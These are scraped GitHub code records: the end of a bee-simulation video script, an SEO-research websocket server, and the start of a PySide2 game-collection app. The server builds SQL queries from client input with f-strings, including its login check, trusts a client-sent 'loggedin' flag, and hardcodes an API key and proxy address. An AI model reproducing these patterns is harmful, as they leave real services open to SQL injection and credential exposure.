maps\nwith h5py.File(env_path, 'r') as infile:\n cmaps = np.array(infile['concentration'])\n\n# Min and max concentrations for heatmap\nmin_c = np.min(cmaps[:])\nmax_c = np.max(cmaps[:]) * 0.8\n\n# Bee measurements\nbee_data = {}\nwith h5py.File(bee_path, 'r') as infile:\n for key, val in infile.items():\n bee_data[key] = np.array(val)\n\nbee_nums = np.unique(bee_data['bee_i'])\nbees = {}\nfor bee_num in bee_nums:\n idxs = np.where(bee_data['bee_i']==bee_num)\n bee_x = bee_data['x'][idxs]\n bee_y = bee_data['y'][idxs]\n bee_state = bee_data['state'][idxs]\n distance = bee_data['distance_from_queen'][idxs]\n bee_grads = bee_data['gradient_x'][idxs], bee_data['gradient_y'][idxs]\n bias = bee_data['wx'][idxs], bee_data['wy'][idxs]\n bees[bee_num] = {\"x\" : bee_x, \"y\" : bee_y, \"state\": bee_state,\n \"distance\": distance, \"grads\" : bee_grads}\n\n# Make frames\ncolors = [\"red\", \"gray\", \"#479030\", \"orange\", \"blue\"]\ncolor_decoder = {\n 0: colors[1],\n 1: colors[2],\n 2: colors[2],\n 3: colors[3],\n 4: colors[4]\n}\nTIME = cmaps.shape[0]\nsavepath = \"\"\nfor frame_i in range(cmaps.shape[0]):\n sys.stdout.write(f\"\\rFrame {frame_i+1}/{TIME}\")\n sys.stdout.flush()\n\n # CONCENTRATION\n cmap = cmaps[frame_i]\n plt.imshow(cmap, cmap='Greens', vmin=min_c, vmax=max_c)\n plt.colorbar(shrink=0.8, format='%.2f')\n\n # QUEEN\n queen = convert_xy_to_index(0)\n plt.scatter(queen, queen, c=\"red\", s=100, edgecolors='black', marker='o')\n\n # WORKERS\n for bee_key, bee_vals in bees.items():\n x = bee_vals['x'][frame_i]\n y = bee_vals['y'][frame_i]\n state = bee_vals['state'][frame_i]\n color = color_decoder[state]\n plt.scatter(convert_xy_to_index(x), convert_xy_to_index(y),\n color=color, s=30, edgecolors='black')\n\n # FORMATTING\n texts = [\"Queen\", \"Random walk pre-scenting\", \"Scenting\", \"Directed walk\", \"Random walk post-scenting\"]\n patches = [ plt.plot([],[], marker=\"o\", ms=5, ls=\"\", mec=None, color=colors[i],\n markeredgecolor=\"black\", label=\"{:s}\".format(texts[i]) )[0] for i in range(len(texts)) ]\n plt.legend(handles=patches, bbox_to_anchor=(0.5, -0.22),\n loc='center', ncol=2, numpoints=1, labelspacing=0.3,\n fontsize='small', fancybox=\"True\",\n handletextpad=0, columnspacing=0)\n plt.xlabel(\"x\")\n plt.ylabel(\"y\")\n plt.xlim(0, 600)\n plt.ylim(600, 0)\n\n if ipynb_dev_config:\n plt.title(f\"Q{QUEEN_BEE_A}_W{WORKER_BEE_A}_D{D}_T{THRESHOLD}_wb{WB}_decay{DECAY}_seed{SEED} \\n t: {frame_i+1}/{TIME-1}\")\n else:\n num_timesteps = np.arange(script_config['t_min'], script_config['t_max']+script_config['dt'], script_config['dt']).shape[0]\n Q = script_config['queen_initial_concentration']\n W = script_config['worker_initial_concentration']\n D = script_config['diffusion_coefficient']\n T = script_config['worker_threshold']\n wb = int(script_config['worker_bias_scalar'])\n decay = int(script_config['decay'])\n seed = int(script_config['random_seed'])\n title = f\"Q{Q}_W{W}_D{D}_T{T:0.5f}_wb{wb}_decay{decay}\"\n savepath = f\"{title}_seed{seed}.mp4\"\n plt.title(f\"{title} \\n t: {frame_i+1}/{TIME}\")\n\n # SAVING FRAMES\n file_path = f't{frame_i+1:04d}.png'\n filename = f'movie_frames/{file_path}'\n plt.savefig(filename, bbox_inches='tight', dpi=100)\n plt.close()\n\n####### Stitching FRAMES\nall_img_paths = np.sort(glob2.glob(\"movie_frames/*.png\"))\nall_imgs = np.array([cv2.imread(img) for img in all_img_paths])\n\nsavepath = f\"movie_frames/{savepath}\"\nimgs2vid(all_imgs, savepath)\n","repo_name":"dieumynguyen/bee_communication_v2","sub_path":"script/make_movie.py","file_name":"make_movie.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69910277522","text":"import asyncio\nimport websockets\nimport requests\nimport json\nimport mysql.connector\nimport pathlib\nfrom unidecode import unidecode\nfrom itertools import groupby\nfrom bs4 import BeautifulSoup\nimport re\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service as ChromeService\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport threading\nimport datetime\nfrom urllib.parse import urlparse\nfrom random_user_agent.user_agent import UserAgent\nfrom random_user_agent.params import SoftwareName, OperatingSystem\n\nconfig_file = pathlib.Path(__file__).with_name(\"config.json\")\nwith open(config_file) as json_file:\n data = json.load(json_file)\n DB_HOST = data['DB_HOST']\n DB_NAME = data['DB_NAME']\n DB_USER = data['DB_USER']\n DB_PASS = data['DB_PASS']\n PORT = data['PORT']\n SERVER = data['SERVER']\n SEO_RANK_API_Key = data['SEO_RANK_API_Key']\n\n\nasync def remove_duplicates():\n con = None\n cursor = None\n try:\n con = mysql.connector.connect(user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n database=DB_NAME)\n cursor = con.cursor()\n sql = \"\"\"DELETE t1 FROM search_result t1\n INNER JOIN (\n SELECT search_history_id, page_url, MIN(id) min_id\n FROM search_result\n GROUP BY search_history_id, page_url\n HAVING COUNT(*) > 1\n ) t2\n ON t1.search_history_id = t2.search_history_id\n AND t1.page_url = t2.page_url\n AND t1.id <> t2.min_id\"\"\"\n cursor.execute(sql)\n con.commit()\n except Exception as e:\n print(f'Error while removing duplicates: {e}')\n finally:\n cursor.close()\n con.close()\n\n\ndef getAPIDATA():\n api_data = [0, '', '', 0, '', 0, 0]\n try:\n sql = f\"SELECT * FROM `api_data` ORDER BY `hits` ASC LIMIT 1\"\n con = mysql.connector.connect(user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n database=DB_NAME)\n cursor = con.cursor()\n cursor.execute(sql)\n api_data = list(cursor.fetchone())\n print(\n f\"Success to select an api_key. ID: {api_data[0]}\")\n except Exception as e:\n print(f'Failed to select an api_key.', e)\n finally:\n cursor.close()\n con.close()\n\n return api_data\n\n\ndef updateHistoryChanges(search_history_id):\n try:\n dt_now = datetime.datetime.now()\n\n sql = f\"UPDATE `search_history` SET `last_modified`='{dt_now.strftime('%Y-%m-%d %H:%M:%S')}' WHERE `id`='{search_history_id}'\"\n con = mysql.connector.connect(user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n database=DB_NAME)\n cursor = con.cursor()\n cursor.execute(sql)\n con.commit()\n except Exception as e:\n print(f'UPDATE search_history failed.', e)\n finally:\n cursor.close()\n con.close()\n\n\ndef isExisting(search_history_id, domain, url):\n existing_urls = []\n try:\n con = mysql.connector.connect(user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n database=DB_NAME)\n cursor = con.cursor()\n sql = f\"SELECT `page_url` FROM `search_result` WHERE `search_history_id`='{search_history_id}' AND `domain` LIKE '{domain}'\"\n cursor.execute(sql)\n existing_urls = [item[0] for item in cursor.fetchall()]\n except Exception as ex:\n print('This domain has already been checked, skipping', ex)\n finally:\n cursor.close()\n con.close()\n\n print('Existing urls', existing_urls)\n\n if url in existing_urls:\n return True\n return False\n\n\ndef increaseHits(api_id):\n try:\n sql = f\"UPDATE `api_data` SET `hits` = `hits` + 1 WHERE `id` = {api_id}\"\n con = mysql.connector.connect(user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n database=DB_NAME)\n cursor = con.cursor()\n cursor.execute(sql)\n con.commit()\n print(\n f\"Success to update a hit. ID: {api_id}\")\n except Exception as e:\n print(f'Failed to update a hit.', e)\n finally:\n cursor.close()\n con.close()\n\n\ndef getSeoRankChecker(your_website_url):\n try:\n # Add https:// before your_website_url and a trailing slash at the end\n your_website_url = your_website_url.strip(\n '/') # remove existing trailing slashes\n your_website_url = \"https://\" + your_website_url + \"/\"\n\n while True:\n seo_url = \"https://seo-rank-checker.p.rapidapi.com/check\"\n seo_querystring = {\"metric\": \"mixed\"}\n seo_payload = {\"url\": your_website_url}\n seo_headers = {\n \"X-RapidAPI-Key\": SEO_RANK_API_Key,\n \"content-type\": \"application/json\",\n \"X-RapidAPI-Host\": \"seo-rank-checker.p.rapidapi.com\"\n }\n seo_response = requests.request(\n \"POST\", seo_url, json=seo_payload, headers=seo_headers, params=seo_querystring)\n seo_json_object = json.loads(seo_response.text)\n\n # Check if hostname is a digit, otherwise try again with \"www.\" added to the URL\n if not str(seo_json_object[\"result\"][\"semrush\"][\"links\"][\"hostname\"]).isdigit():\n your_website_url = your_website_url.replace(\n \"https://\", \"https://www.\")\n your_website_url = your_website_url.rstrip(\n '/') # remove any trailing slashes\n continue\n\n return seo_json_object\n except Exception as e:\n print('***** getSeoRankChecker *****')\n print(f'Error in {your_website_url}', e)\n print('**********')\n\n\ndef getTitleOfPage(page_url):\n\n # List of file extensions to check for\n file_extensions = (\".pdf\", \".doc\", \".docx\", \".PDF\", \".DOC\", \".DOCX\")\n\n # Get random user agent\n software_names = [SoftwareName.CHROME.value]\n operating_systems = [OperatingSystem.WINDOWS.value,\n OperatingSystem.LINUX.value]\n user_agent_rotator = UserAgent(\n software_names=software_names, operating_systems=operating_systems, limit=100)\n\n # Try getting title with requests + proxy + random user agent\n def simple_method(page_url, proxy=None):\n try:\n headers = {\"User-Agent\": user_agent_rotator.get_random_user_agent()}\n response = requests.get(\n page_url, proxies=proxy, headers=headers, timeout=10)\n soup = BeautifulSoup(response.content, \"html.parser\")\n title_tag = soup.find(\"title\")\n if title_tag:\n title = title_tag.text\n else:\n title = None\n except Exception as e:\n title = None\n return title\n\n # If blocked, use APILayer meta tags API\n def get_meta_tags_using_api(page_url):\n api_url = f\"https://api.apilayer.com/meta_tags?url={page_url}&proxy=true\"\n headers = {\n \"apikey\": \"fbBYQNnJgQsG7ES2dFQ7FGw53MWD3vyU\"\n }\n try:\n response = requests.get(api_url, headers=headers, timeout=10)\n status_code = response.status_code\n result = response.text\n return status_code, result\n except Exception as e:\n return None, None\n\n # Grab title function\n PROXY = {\"http\": \"http://193.164.199.29:3128\"}\n\n def is_title_blocked(title, blocked_titles):\n return any(partial_title in title for partial_title in blocked_titles)\n\n # Grab title function\n def grabtitle():\n\n if page_url.endswith(file_extensions):\n return \"[Unreachable]\"\n\n title = simple_method(page_url, PROXY)\n\n blocked_titles = [\"Robot Challenge Screen\", \"Access Denied\", \"Just a moment\", \"403 Forbidden\", \"503 Service Temporarily Unavailable\", \"Security check\", \"Not Acceptable!\", \"Temporary Page\", \"Sucuri WebSite Firewall - Access Denied\", \"502 Bad Gateway\", \"520\", \"StackPath\"]\n\n if is_title_blocked(title, blocked_titles):\n status_code, result = get_meta_tags_using_api(page_url)\n\n if status_code is not None and result is not None:\n result_json = json.loads(result) # Parse the JSON response\n title_from_api = result_json.get(\n 'title', None) # Get the \"title\" value\n\n if title_from_api is not None:\n return title_from_api\n else:\n title = simple_method(page_url)\n return title if title is not None else \"[Unreachable]\"\n else:\n title = simple_method(page_url)\n return title if title is not None else \"[Unreachable]\"\n else:\n return title if title is not None else \"[Unreachable]\"\n\n page_title = grabtitle()\n page_title = unidecode(page_title)\n page_title = page_title.replace(\"’\", \"'\").replace(\"‘\", \"'\").replace(\"'\", \"'\")\n page_title = re.sub(\"[^a-zA-Z0-9-.' ]+\", \" \", page_title)\n page_title = page_title.split('|')[0]\n page_title = page_title.split(' - ')[0]\n page_title = page_title.strip()\n if page_title == '':\n page_title = '[Unreachable]'\n else:\n url_parse = urlparse(page_url)\n if url_parse.path == '' or url_parse.path == '/':\n page_title = '[Homepage] ' + page_title\n\n print(f\"page_url: {page_url}, page_title: {page_title}\")\n\n return page_title\n\n\ndef data_processor(raw_message):\n print(f'Received data as: {raw_message}')\n json_object = json.loads(raw_message)\n return json_object\n\n\n# A set of connected ws clients\nconnected = set()\n\n\ndef between_callback_thread(json_message, websocket):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(broadcast_messages(json_message, websocket))\n loop.close()\n\n\nasync def handler(websocket, path):\n remote_ip = websocket.remote_address[0]\n print(f'A client just connected at IP: {remote_ip}')\n connected.add(websocket)\n try:\n async for raw_message in websocket:\n print(\"Received message from client: \" + raw_message)\n for conn in connected:\n if conn == websocket:\n json_message = json.loads(raw_message)\n if 'email' in json_message and 'loggedin' in json_message:\n try:\n sql = f\"SELECT * FROM `user` WHERE `email` LIKE '{json_message['email']}'\"\n con = mysql.connector.connect(user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n database=DB_NAME)\n cursor = con.cursor()\n cursor.execute(sql)\n users = cursor.fetchall()\n if len(users) > 0 and json_message['loggedin'] == 1:\n print(\"Authentication Success\")\n await websocket.send('pong')\n else:\n await websocket.close(1011, \"Authentication failed\")\n except Exception as e:\n print(f'Authentication failed.', e)\n await websocket.close(1011, \"Authentication failed\")\n finally:\n cursor.close()\n con.close()\n continue\n elif 'filtered_domain' in raw_message:\n '''\n # Thread sending #\n '''\n server = threading.Thread(target=between_callback_thread, args=(\n json_message, websocket), daemon=True)\n server.start()\n\n print(f'success boradcast_messages to {remote_ip}')\n\n except websockets.exceptions.ConnectionClosed as e:\n print(f\"{remote_ip} client just disconnected\")\n finally:\n connected.remove(websocket)\n\n\nasync def broadcast(domain_json, search_history_id, your_website_url_da, websocket=None):\n domain = domain_json['domain']\n traffic_sum = domain_json['traffic_sum']\n stat_total_keywords = domain_json['total_keywords']\n\n api_data = getAPIDATA()\n SERANKING_TOKEN = api_data[1]\n proxy_ip = api_data[4]\n proxy_port = api_data[5]\n\n proxies = {\n 'http': f'{proxy_ip}:{proxy_port}',\n 'https': f'{proxy_ip}:{proxy_port}',\n }\n\n url = f\"https://api4.seranking.com/research/us/keywords/?domain={domain}&type=organic&group=url&source=us¤cy=USD&base_domain={domain}&sort=traffic_percent&sort_order=desc&limit=1000&offset=0\"\n payload = {}\n headers = {\n 'Authorization': f'Token {SERANKING_TOKEN}'\n }\n response = requests.request(\n \"GET\", url, headers=headers, data=payload, proxies=proxies)\n\n increaseHits(api_data[0])\n\n json_object = json.loads(response.text)\n\n json_object.sort(key=lambda content: content['url'])\n groups = groupby(json_object, lambda content: content['url'])\n\n stat_seo_viability = 0\n stat_page_authority = 0\n\n stat_domain_authority = 0\n stat_rank = 0\n stat_links = 0\n\n seo_json_object = getSeoRankChecker(domain)\n if 'success' in seo_json_object and seo_json_object['success']:\n stat_rank = seo_json_object['result']['semrush']['rank']\n stat_links = seo_json_object['result']['semrush']['links']['domain']\n stat_domain_authority = seo_json_object['result']['authority']['domain']\n\n if str(stat_rank).isdigit() == False:\n stat_rank = 0\n if str(stat_links).isdigit() == False:\n stat_links = 0\n if str(stat_domain_authority).isdigit() == False:\n stat_domain_authority = 0\n\n json_result = []\n for page_url, contents in groups:\n is_existing = isExisting(search_history_id, domain, page_url)\n if is_existing:\n continue\n stat_traffic_percentage = round(sum(content['traffic_percent']\n for content in contents), 2)\n json_result.append({\n 'search_history_id': search_history_id,\n 'page_title': '',\n 'page_url': page_url,\n 'domain': domain,\n 'stat_seo_viability': stat_seo_viability,\n 'stat_traffic_percentage': stat_traffic_percentage,\n 'stat_total_keywords': stat_total_keywords,\n 'stat_domain_authority': stat_domain_authority,\n 'stat_page_authority': stat_page_authority,\n 'stat_rank': stat_rank,\n 'stat_links': stat_links,\n })\n\n json_result.sort(key=lambda content: -content['stat_traffic_percentage'])\n\n records = []\n record_cnt = 0\n batch_size = 3\n batch_records = []\n\n for content in json_result[:100]:\n try:\n con = mysql.connector.connect(user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n database=DB_NAME)\n cursor = con.cursor()\n\n record_cnt += 1\n search_history_id = content['search_history_id']\n page_url = content['page_url']\n domain = content['domain']\n stat_seo_viability = content['stat_seo_viability']\n stat_traffic_percentage = content['stat_traffic_percentage']\n stat_total_keywords = content['stat_total_keywords']\n stat_domain_authority = content['stat_domain_authority']\n stat_page_authority = content['stat_page_authority']\n stat_rank = content['stat_rank']\n stat_links = content['stat_links']\n\n if record_cnt <= 3:\n stat_seo_viability = 3\n if record_cnt <= 15:\n stat_seo_viability += 1\n if your_website_url_da > stat_domain_authority:\n stat_seo_viability += 1\n if your_website_url_da - 10 < stat_domain_authority:\n stat_seo_viability += 1\n if your_website_url_da - 20 < stat_domain_authority:\n stat_seo_viability += 1\n if stat_traffic_percentage > traffic_sum * 5 / 100:\n stat_seo_viability += 1\n if stat_traffic_percentage > traffic_sum * 20 / 100:\n stat_seo_viability += 1\n if stat_traffic_percentage > traffic_sum * 40 / 100:\n stat_seo_viability += 1\n\n # get page title\n page_title = getTitleOfPage(page_url)\n '''\n Insert search_result for page_url into database\n '''\n val = (\n search_history_id, page_title, page_url, domain, stat_seo_viability, stat_traffic_percentage, stat_total_keywords, stat_domain_authority, stat_page_authority, stat_rank, stat_links\n )\n\n sql = \"\"\"\n INSERT INTO `search_result` \n (search_history_id, page_title, page_url, domain, stat_seo_viability, \n stat_traffic_percentage, stat_total_keywords, stat_domain_authority, \n stat_page_authority, stat_rank, stat_links) \n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n cursor.execute(sql, val)\n \n lastrowid = cursor.lastrowid\n if lastrowid < 1:\n continue\n \n updateHistoryChanges(search_history_id)\n \n batch_records.append({\n 'id': lastrowid,\n 'search_history_id': search_history_id,\n 'page_title': page_title,\n 'page_url': page_url,\n 'domain': domain,\n 'stat_seo_viability': stat_seo_viability,\n 'stat_traffic_percentage': stat_traffic_percentage,\n 'stat_total_keywords': stat_total_keywords,\n 'stat_domain_authority': stat_domain_authority,\n 'stat_page_authority': stat_page_authority,\n 'stat_rank': stat_rank,\n 'stat_links': stat_links,\n })\n \n if record_cnt % batch_size == 0:\n con.commit()\n \n if websocket is not None:\n try:\n await websocket.send(json.dumps(batch_records))\n except Exception as ex:\n print('Exception in Websocket send', ex)\n \n print(f'***** Success to send {record_cnt} records *****')\n batch_records = []\n \n except Exception as ex:\n print('Exception in Content data within 100', ex)\n \n if batch_records:\n con.commit()\n if websocket is not None:\n try:\n await websocket.send(json.dumps(batch_records))\n except Exception as ex:\n print('Exception in Websocket send', ex)\n \n print(f'***** Success to send {record_cnt} records *****')\n \n # Don't forget to close the cursor and connection at the end\n cursor.close()\n con.close()\n\n\nasync def broadcast_messages(json_object, websocket):\n search_history_id = json_object['search_history_id']\n filtered_domain = json_object['filtered_domain']\n your_website_url = json_object['your_website_url']\n domains = json.dumps(filtered_domain)\n\n try:\n sql = f\"UPDATE `search_history` SET `domains` = '{domains}' WHERE `id` = {search_history_id}\"\n con = mysql.connector.connect(user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n database=DB_NAME)\n cursor = con.cursor()\n cursor.execute(sql)\n con.commit()\n print(\n f\"search_history domains update success. ID: {search_history_id}\")\n except Exception as e:\n print(f'search_history domains update failed.', e)\n finally:\n cursor.close()\n con.close()\n\n seo_json_object = getSeoRankChecker(your_website_url)\n your_website_url_da = 0\n\n if 'success' in seo_json_object and seo_json_object['success']:\n your_website_url_da = seo_json_object['result']['authority']['domain']\n\n for domain_json in filtered_domain:\n try:\n await broadcast(domain_json, search_history_id, your_website_url_da, websocket)\n except Exception as e:\n print(f'There is an issue to broadcast in {your_website_url}', e)\n try:\n sql = f\"UPDATE `search_history` SET `status`='COMPLETED' WHERE `id`={search_history_id}\"\n con = mysql.connector.connect(user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n database=DB_NAME)\n cursor = con.cursor()\n cursor.execute(sql)\n con.commit()\n print(\n f\"search_history status updated as 'COMPLETED', ID: {search_history_id}\")\n except Exception as e:\n print(f'search_history status updated failed.', e)\n finally:\n cursor.close()\n con.close()\n print('***** COMPLETED *****')\n await websocket.send('COMPLETED')\n\n\nasync def do_stuff_periodically(interval):\n while True:\n await asyncio.gather(\n asyncio.sleep(interval),\n search_history_checker(),\n remove_duplicates()\n )\n \n\ndef cron_search_progress_checker():\n print(\"***** cron_search_progress_checker starting...*****\")\n asyncio.run(do_stuff_periodically(60*1))\n\n\nasync def search_history_checker():\n print('**** create search_history_checker...')\n\n try:\n dt_30mins_ago = datetime.datetime.now() - datetime.timedelta(minutes=1)\n con = mysql.connector.connect(user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n database=DB_NAME)\n cursor = con.cursor()\n sql = f\"SELECT * FROM `search_history` WHERE `status` LIKE 'PROGRESS' AND `domains` IS NOT NULL AND `last_modified` < '{dt_30mins_ago.strftime('%Y-%m-%d %H:%M:%S')}' ORDER By `last_modified` DESC LIMIT 1\"\n cursor.execute(sql)\n search_history_rows = cursor.fetchall()\n cursor.close()\n con.close()\n\n for row in search_history_rows:\n \n id = row[0]\n your_website_url = row[6]\n \n try:\n filtered_domain = json.loads(row[11])\n except json.JSONDecodeError:\n print(f\"Failed to decode JSON for row: {row}\")\n continue\n \n if row[11] == '':\n continue\n filtered_domain = json.loads(row[11])\n if filtered_domain is None:\n continue\n\n seo_json_object = getSeoRankChecker(your_website_url)\n your_website_url_da = 0\n\n if 'success' in seo_json_object and seo_json_object['success']:\n your_website_url_da = seo_json_object['result']['authority']['domain']\n\n try:\n con = mysql.connector.connect(user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n database=DB_NAME)\n cursor = con.cursor()\n sql = f\"SELECT `domain` FROM `search_result` WHERE `search_history_id`={id} GROUP BY `domain`\"\n cursor.execute(sql)\n domains = [item[0] for item in cursor.fetchall()]\n print(f'existing domains: {domains}')\n print(f'{sql} Success')\n except Exception as e:\n print(f'{sql} Failed', e)\n finally:\n cursor.close()\n con.close()\n\n for domain_json in filtered_domain:\n domain = domain_json['domain']\n if domain in domains:\n continue\n try:\n await broadcast(domain_json, id, your_website_url_da)\n except Exception as e:\n print(\n f'There is an issue to broadcast in search_history_checker')\n\n try:\n con = mysql.connector.connect(user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n database=DB_NAME)\n cursor = con.cursor()\n sql = f\"UPDATE `search_history` SET `status`='COMPLETED' WHERE `id`={id}\"\n cursor.execute(sql)\n con.commit()\n print(\n f\"search_history status updated as 'COMPLETED', ID: {id}\")\n except Exception as e:\n print(f'search_history status updated failed.', e)\n finally:\n cursor.close()\n con.close()\n print('***** COMPLETED *****')\n except Exception as e:\n print(f'search_history PROGRESS query failed.', e)\n\n print('**** search_history_checker end...')\n\nif __name__ == \"__main__\":\n api_data = getAPIDATA()\n print(api_data)\n print(api_data[6])\n _cron_thread = threading.Thread(target=cron_search_progress_checker)\n _cron_thread.start()\n\n print('socket is starting...')\n start_server = websockets.serve(handler, SERVER, PORT, ssl=None)\n asyncio.get_event_loop().run_until_complete(start_server)\n asyncio.get_event_loop().run_forever()\n","repo_name":"jmsprsns/tfserver","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":26100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17467854580","text":"#!/usr/bin/env python\nfrom os import path\nfrom time import sleep\n\nimport requests\nfrom PySide2.QtGui import QIcon\nfrom PySide2.QtSql import QSqlDatabase, QSqlQuery\nfrom PySide2.QtWidgets import QMainWindow, QDialog, QTabWidget, \\\n QAction, QMenu, QApplication, QMessageBox, QLineEdit, QDesktopWidget, \\\n QWidget, QLabel, QPushButton, QInputDialog, QProgressBar, QVBoxLayout, QComboBox, QHBoxLayout\n\nfrom utilities.exportcsv import sql2csv\nfrom utilities.fetchinfo import getMobyRelease\nfrom utilities.fetchprice import getPriceData\nfrom utilities.steamlibrary import getSteamLibrary\nfrom utilities.log import logger\nfrom widgets.importwindow import ImportWindow\nfrom widgets.inputwindow import InputWindow\nfrom widgets.overview import Overview\nfrom widgets.randomizer import Randomizer\nfrom widgets.filterdock import FilterDock\nfrom widgets.sidepanel import SidePanel\nfrom widgets.table import Table\n\n_VERSION = \"0.5.3\"\n\n\nclass MainWindow(QMainWindow):\n\n # noinspection PyUnresolvedReferences\n def __init__(self, dbpath):\n super(MainWindow, self).__init__()\n\n # 'Add to collection' window\n self.addWindow = None\n\n # 'Import games' window\n self.importWindow = None\n\n # Side panel\n self.sidePanel = SidePanel()\n\n # Tables and their databases\n db = QSqlDatabase.addDatabase(\"QSQLITE\")\n db.setDatabaseName(dbpath)\n if not db.open():\n logger.critical(f\"Couldn't open database: {db.lastError().text()}\")\n QMessageBox.critical(None, \"Database Error\", db.lastError().text())\n self.gamesTableView = Table(\"games\", db)\n self.gamesTableView.doubleClick.connect(self.sidePanel.showDetails)\n self.consolesTableView = Table(\"consoles\", db)\n self.consolesTableView.doubleClick.connect(self.sidePanel.showDetails)\n self.accessoriesTableView = Table(\"accessories\", db)\n self.accessoriesTableView.doubleClick.connect(self.sidePanel.showDetails)\n self.tableViewList = [self.gamesTableView,\n self.consolesTableView,\n self.accessoriesTableView]\n\n self.allPlatforms = set()\n self.allRegions = set()\n self.allGenres = set()\n self.allYears = set()\n for table in self.tableViewList:\n for row in table.ownedItems():\n self.allPlatforms.add(row[\"platform\"])\n self.allRegions.add(row[\"region\"])\n self.allYears.add(row[\"year\"])\n # Split multi-genre entries\n for genre in row[\"genre\"].split(\", \"):\n self.allGenres.add(genre)\n\n self.filterDock = FilterDock(sorted(self.allPlatforms, key=str.lower),\n sorted(self.allRegions, key=str.lower),\n sorted(self.allGenres, key=str.lower),\n sorted(self.allYears, key=str.lower))\n\n # Overview tab\n self.overview = Overview(self.tableViewList)\n\n # Randomizer tab\n self.randomizer = Randomizer(self.gamesTableView.ownedItems(),\n sorted(self.allPlatforms, key=str.lower),\n sorted(self.allGenres, key=str.lower))\n self.randomizer.consoleList.itemClicked.connect(self.updateStatusbar)\n self.randomizer.genreList.itemClicked.connect(self.updateStatusbar)\n self.randomizer.genreMatchExclusiveCB.stateChanged.connect(self.updateStatusbar)\n self.randomizer.btnAll.clicked.connect(self.updateStatusbar)\n self.randomizer.btnNone.clicked.connect(self.updateStatusbar)\n\n ## MainWindow layout\n # Widgets\n self.centralWidget = QWidget()\n self.setCentralWidget(self.centralWidget)\n self.tab = QTabWidget()\n\n self.toolbar = self.addToolBar(\"Exit\")\n self.toolbar.addAction(self.buttonActions(\"exit\"))\n self.toolbar.addAction(self.buttonActions(\"add\"))\n self.toolbar.addAction(self.buttonActions(\"import\"))\n\n self.fileMenu = self.menuBar().addMenu(self.tr(\"&File\"))\n self.fileMenu.addAction(self.buttonActions(\"add\"))\n self.fileMenu.addAction(self.buttonActions(\"export\"))\n self.fileMenu.addAction(self.buttonActions(\"import\"))\n self.fileMenu.addAction(self.buttonActions(\"steam\"))\n self.fileMenu.addAction(self.buttonActions(\"fetch\"))\n self.fileMenu.insertSeparator(self.buttonActions(\"exit\"))\n self.fileMenu.addAction(self.buttonActions(\"exit\"))\n self.viewMenu = self.menuBar().addMenu(self.tr(\"&View\"))\n self.viewMenu.addAction(self.buttonActions(\"owned\"))\n self.viewMenu.addAction(self.buttonActions(\"delnotowned\"))\n self.viewMenu.addAction(self.buttonActions(\"value\"))\n self.helpMenu = self.menuBar().addMenu(self.tr(\"&Help\"))\n self.helpMenu.addAction(self.buttonActions(\"about\"))\n\n self.statusProgressBar = QProgressBar()\n self.statusProgressBar.setMaximumSize(100, 15)\n self.statusProgressBar.setRange(0, 0)\n self.statusProgressBar.setVisible(False)\n self.statusBar().addPermanentWidget(self.statusProgressBar)\n\n # Search stuff\n self.searchLabel = QLabel(\"Search\")\n self.searchLabel.setVisible(False)\n self.searchBox = QLineEdit()\n self.searchBox.setVisible(False)\n self.searchBox.setClearButtonEnabled(True)\n # self.searchBox.textChanged.connect(self.search)\n self.searchBox.returnPressed.connect(self.search)\n self.searchBtn = QPushButton(\"Search\")\n self.searchBtn.clicked.connect(self.search)\n self.searchBtn.setVisible(False)\n self.filterBtn = QPushButton(\"Filter\")\n self.filterBtn.clicked.connect(self.filterDock.toggleVisibility)\n self.filterBtn.setVisible(False)\n\n # Tab layout.\n self.tab.addTab(self.overview.widget, \"Overview\")\n self.tab.addTab(self.gamesTableView, \"Games\")\n self.tab.addTab(self.consolesTableView, \"Consoles\")\n self.tab.addTab(self.accessoriesTableView, \"Accessories\")\n self.tab.addTab(self.randomizer.widget, \"Randomizer\")\n self.tab.currentChanged.connect(self.search)\n self.tab.currentChanged.connect(self.sidePanel.hideDetails)\n # Connect sidePanel's saved signal to corresponding table's updateData()\n # TODO: Update the sets of platforms and genres properly\n self.sidePanel.saved.connect(self.tableViewList[self.tab.currentIndex()].updateData)\n self.sidePanel.saved.connect(lambda: self.randomizer.updateLists(self.gamesTableView.ownedItems(),\n sorted(self.allPlatforms, key=str.lower),\n sorted(self.allGenres, key=str.lower)))\n\n # Main layout\n self.tabHbox = QHBoxLayout()\n self.tabHbox.addWidget(self.tab, 1)\n self.tabHbox.addWidget(self.sidePanel, 1)\n self.advSearchHbox = QHBoxLayout()\n self.advSearchHbox.addWidget(self.filterDock, 0)\n self.searchHbox = QHBoxLayout()\n self.searchHbox.addWidget(self.searchLabel, 0)\n self.searchHbox.addWidget(self.searchBox, 1)\n self.searchHbox.addWidget(self.filterBtn, 0)\n self.searchHbox.addWidget(self.searchBtn, 0)\n self.mainLayout = QVBoxLayout()\n self.mainLayout.addLayout(self.tabHbox, 1)\n self.mainLayout.addLayout(self.advSearchHbox, 0)\n self.mainLayout.addLayout(self.searchHbox, 0)\n self.centralWidget.setLayout(self.mainLayout)\n\n # Make sure screen geometry is big enough. Otherwise set window to maximized.\n gSize = QApplication.desktop().availableGeometry()\n if gSize.width() <= 1280 or gSize.height() <= 768:\n logger.info(\"Screen geometry smaller than 1280x768. Setting window to maximized mode.\")\n self.showMaximized()\n else:\n self.resize(1280, 